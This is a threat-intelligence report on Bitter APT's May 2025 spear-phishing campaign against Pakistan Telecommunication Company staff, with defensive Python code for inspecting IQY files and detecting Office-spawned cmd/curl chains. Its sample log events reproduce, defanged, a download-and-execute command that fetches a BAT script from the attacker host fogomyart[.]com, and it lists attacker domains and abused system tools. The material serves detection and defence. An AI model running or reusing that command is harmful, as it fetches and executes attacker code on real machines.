Full Report
Executive Summary
On May 7, 2025, during the active military escalation between Pakistan and India, specifically in the context of India's military campaign 'Operation Sindoor', EclecticIQ analysts observed that Bitter APT (also known as TA397) [1] very likely targeted workers at the Pakistan Telecommunication Company Limited (PTCL) [2] in a spear-phishing campaign, very likely intended to deliver malware. Analysts assess that Bitter APT is very likely a South Asian state-sponsored actor conducting cyber-enabled espionage operations that steal state and trade secrets.
Analysis Summary
# Threat Actor: Bitter APT (TA397)
## Attribution & Identity
* **Identification:** Bitter APT (also known as TA397).
* **Attribution:** Very likely a South Asian state-sponsored actor.
## Activity Summary
In May 2025, during the active military escalation between Pakistan and India ('Operation Sindoor'), Bitter APT targeted workers at the Pakistan Telecommunication Company Limited (PTCL) with a spear-phishing campaign intended to deliver malware. The phishing email was sent from a Pakistan Counter Terrorism Department (CTD) email account whose credentials had very likely been stolen. The timing fits the actor's established pattern of strategic intelligence gathering during regional conflict.
## Tactics, Techniques & Procedures
* **Initial Access:** A legitimate email account belonging to Pakistan's Counter Terrorism Department (CTD) whose credentials were very likely stolen by a StealC infostealer variant that had earlier compromised a CTD machine.
* **Spear Phishing:** A spear-phishing email sent from the compromised CTD account.
* **Delivery Mechanism:** An **Internet Query (IQY) attachment** ("Security Brief Report.iqy"). IQY files are plain-text Excel web-query files that hold a URL rather than code, which helps them pass attachment filters; when the recipient opens one, Excel retrieves the referenced content, and in this campaign that content carried the malicious **Excel macro** that started the infection chain.
* **Execution:** The macro launched the Windows `cmd` interpreter to download and run the next-stage payload.
* **Payload Delivery/Execution Chain:** The command line invoked `curl.exe` to fetch a malicious BAT script from `fogomyart[.]com/random.php`; the script in turn executed a variant of **WmRAT**.
* **Infostealer Precursor:** The CTD machine had previously been infected with a **StealC infostealer variant** after its user downloaded "cracked" software; the resulting credential harvesting was observed in August 2024.
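The IQY step above is worth seeing concretely. An IQY file is a small text file: a `WEB` header, a version line, the URL Excel will fetch, and optional `key=value` settings. The parser and gateway check below are an added example written for this page, not code from EclecticIQ or from the actor's toolkit; the sample file, the placeholder URL `fetch.example`, and the allowlist host `reports.corp.example` are constructed, and nothing in it reproduces the real "Security Brief Report.iqy" attachment.

```python
"""Parse an Excel Internet Query (.iqy) attachment and flag what Excel would fetch.

Added example: the IQY layout (WEB / 1 / URL / key=value options) is standard
Excel behaviour; the sample file, URL and allowlist below are constructed.
"""
from __future__ import annotations

from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed sample IQY file. The placeholder URL is not an indicator from the report.
SAMPLE_IQY = """WEB
1
http://fetch.example/brief.html
Selection=EntirePage
Formatting=None
PreFormattedTextToColumns=True
DisableRedirections=False
"""

# Hypothetical allowlist: internal hosts that legitimately serve Excel web queries.
ALLOWED_HOSTS = {"reports.corp.example"}


@dataclass
class IqyVerdict:
    url: str
    options: dict[str, str] = field(default_factory=dict)
    reasons: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_iqy(text: str) -> IqyVerdict:
    """Return the URL and options Excel would act on; raise if this is not a WEB query file."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB" or lines[1] != "1":
        raise ValueError("not a WEB query file (expected 'WEB', '1', URL)")
    url = lines[2]
    options: dict[str, str] = {}
    for ln in lines[3:]:
        key, _, val = ln.partition("=")
        options[key] = val
    return IqyVerdict(url=url, options=options)


def assess_iqy(text: str, allowed_hosts: set[str] = ALLOWED_HOSTS) -> IqyVerdict:
    """Parse, then apply gateway rules: unapproved host, plain HTTP, redirects permitted."""
    verdict = parse_iqy(text)
    parsed = urlparse(verdict.url)
    host = (parsed.hostname or "").lower()
    if host not in allowed_hosts:
        verdict.reasons.append(f"query target {host!r} is not an approved data source")
    if parsed.scheme != "https":
        verdict.reasons.append(f"non-HTTPS scheme {parsed.scheme!r}: content can be altered in transit")
    # Excel follows redirects unless DisableRedirections=True, so the listed URL may not be the final one.
    if verdict.options.get("DisableRedirections", "False").lower() == "false":
        verdict.reasons.append("redirects allowed: the final fetch target may differ from the listed URL")
    return verdict


if __name__ == "__main__":
    result = assess_iqy(SAMPLE_IQY)
    print(result.url, result.suspicious, result.reasons)
```

The point of the check is that the attachment itself contains nothing executable, so signature-based scanning of the file has little to work with; the decision has to be made on the URL and on whether the recipient's organisation has any business accepting web-query files from outside at all.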
## Targeting
* **Sectors:** Telecommunications (PTCL); law enforcement/government (CTD, the source of the compromised sender account).
* **Geography:** Pakistan (Targeting PTCL and CTD infrastructure).
* **Victims:** Pakistan Telecommunication Company Limited (PTCL) workers, specifically targeting personnel in critical roles: 5G infrastructure engineers, DevOps specialists, project managers, and satellite communication experts.
## Tools & Infrastructure
* **Malware Families Used:** WmRAT variant, StealC infostealer variant.
* **Infrastructure (C2):** A command and control domain previously linked to Bitter APT: `tradesmarkets[.]greenadelhouse[.]com` (resolved to a known associated IP).
* **Download Host:** `fogomyart[.]com` (used to host follow-on components like a BAT script).
## Implications
Bitter APT is engaged in cyber-enabled espionage, focused specifically on stealing **state and trade secrets**. The successful compromise and subsequent abuse of a high-value victim (CTD) to pivot against another critical national entity (PTCL) during a period of heightened military conflict demonstrates their intent to gather intelligence on national infrastructure and security operations during sensitive geopolitical events.
## Mitigations
* Enforce multi-factor authentication, especially on government and critical national infrastructure email accounts; a password harvested by an infostealer is far less useful to an attacker when it cannot log in on its own.
* Block or quarantine IQY attachments at the email gateway, since web-query files are rarely needed in inbound mail, and alert on Excel opening `.iqy` files on endpoints.
* Monitor for Office applications (for example `EXCEL.EXE`) spawning `cmd.exe`, and for `curl.exe` or other native utilities making outbound connections when their process ancestry includes an Office application.
* Hunt CTD systems for prior or current StealC infections and rotate the credentials of any affected accounts; the credential theft behind this campaign shows a lower-tier infection vector (cracked software) being used to obtain initial access for later targeted operations.
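The process-ancestry check in the mitigations above is easy to get wrong if a rule only looks at the direct parent: in the chain this report describes, `curl.exe` is a child of `cmd.exe`, not of Excel. The detector below is an added example, not EclecticIQ's or any vendor's rule; it walks Sysmon-style process-creation records (Event ID 1 fields `ProcessGuid`, `ParentProcessGuid`, `Image`, `CommandLine`) back to any Office ancestor. The events are constructed to mirror the reported chain; the command lines, paths and GUIDs are illustrative, not captured telemetry, and the download URL is shown defanged.

```python
"""Flag cmd/curl (and similar) processes whose ancestry includes an Office application.

Added example: the events below are constructed Sysmon-style records shaped after
the Excel -> cmd.exe -> curl.exe chain described in the report; nothing here is
captured data.
"""
from __future__ import annotations

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LIVING_OFF_LAND = {"cmd.exe", "curl.exe", "powershell.exe", "wscript.exe", "mshta.exe", "certutil.exe"}
NETWORK_HINTS = ("http://", "https://", "-o ", "--output")

# Constructed events. ParentProcessGuid links each child to its parent record.
SAMPLE_EVENTS = [
    {"ProcessGuid": "g1", "ParentProcessGuid": "g0", "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessGuid": "g2", "ParentProcessGuid": "g1",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r'"EXCEL.EXE" "C:\Users\u\Downloads\Security Brief Report.iqy"'},
    {"ProcessGuid": "g3", "ParentProcessGuid": "g2", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c curl.exe -o %TEMP%\r.bat http://fogomyart[.]com/random.php && %TEMP%\r.bat"},
    {"ProcessGuid": "g4", "ParentProcessGuid": "g3", "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -o C:\Users\u\AppData\Local\Temp\r.bat http://fogomyart[.]com/random.php"},
    # Benign: cmd.exe launched from Explorer, no Office ancestor.
    {"ProcessGuid": "g5", "ParentProcessGuid": "g1", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
    # Benign: curl.exe whose parent is outside the captured window.
    {"ProcessGuid": "g6", "ParentProcessGuid": "g0", "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe https://updates.corp.example/manifest.json"},
]


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_ancestor(event: dict, by_guid: dict[str, dict], max_depth: int = 8) -> str | None:
    """Walk ParentProcessGuid links; return the first Office ancestor's image name, or None."""
    guid = event.get("ParentProcessGuid")
    for _ in range(max_depth):          # bounded so a malformed or cyclic log cannot spin forever
        parent = by_guid.get(guid)
        if parent is None:
            return None
        name = _basename(parent["Image"])
        if name in OFFICE_APPS:
            return name
        guid = parent.get("ParentProcessGuid")
    return None


def detect_office_lolbin_chains(events: list[dict]) -> list[dict]:
    """Return one alert per living-off-the-land process that descends from an Office app."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    alerts = []
    for e in events:
        name = _basename(e["Image"])
        if name not in LIVING_OFF_LAND:
            continue
        ancestor = office_ancestor(e, by_guid)
        if ancestor is None:
            continue
        cmd = e.get("CommandLine", "")
        # A URL or output-file flag on the command line means a download, not just a shell.
        severity = "high" if any(h in cmd.lower() for h in NETWORK_HINTS) else "medium"
        alerts.append({"guid": e["ProcessGuid"], "image": name, "office_ancestor": ancestor,
                       "severity": severity, "command": cmd})
    return alerts


if __name__ == "__main__":
    for alert in detect_office_lolbin_chains(SAMPLE_EVENTS):
        print(alert["severity"], alert["image"], "<-", alert["office_ancestor"], "|", alert["command"])
```

On the sample both `cmd.exe` (g3) and `curl.exe` (g4) are flagged as high severity with `excel.exe` as the ancestor, while the Explorer-spawned `cmd.exe` and the orphaned `curl.exe` are not. The ancestry walk is what makes the second hit possible; a direct-parent rule would catch g3 and miss g4, which is the process that actually touches the network.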